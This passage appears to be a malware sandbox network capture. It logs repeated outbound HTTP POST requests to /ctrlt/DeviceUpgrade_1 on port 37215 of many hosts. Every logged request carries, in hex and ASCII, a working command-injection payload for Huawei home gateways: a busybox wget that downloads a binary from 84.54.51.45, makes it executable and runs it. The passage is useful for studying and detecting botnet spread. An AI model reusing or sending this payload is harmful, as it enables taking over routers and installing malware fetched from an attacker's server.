68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            945192.168.2.155703041.135.38.5037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745971918 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            946192.168.2.155374041.45.16.2137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746010065 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            947192.168.2.153324241.61.208.15037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746010065 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            948192.168.2.155947441.44.137.17137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746048927 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            949192.168.2.153693241.222.166.12637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746082067 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            950192.168.2.154732441.184.196.20137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746107101 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            951192.168.2.156092641.17.134.9837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746143103 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            952192.168.2.155521441.29.201.12137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746150017 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            953192.168.2.153480241.122.175.21137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746177912 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            954192.168.2.153374441.120.11.8037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746206045 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            955192.168.2.154387841.230.29.12737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746232986 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
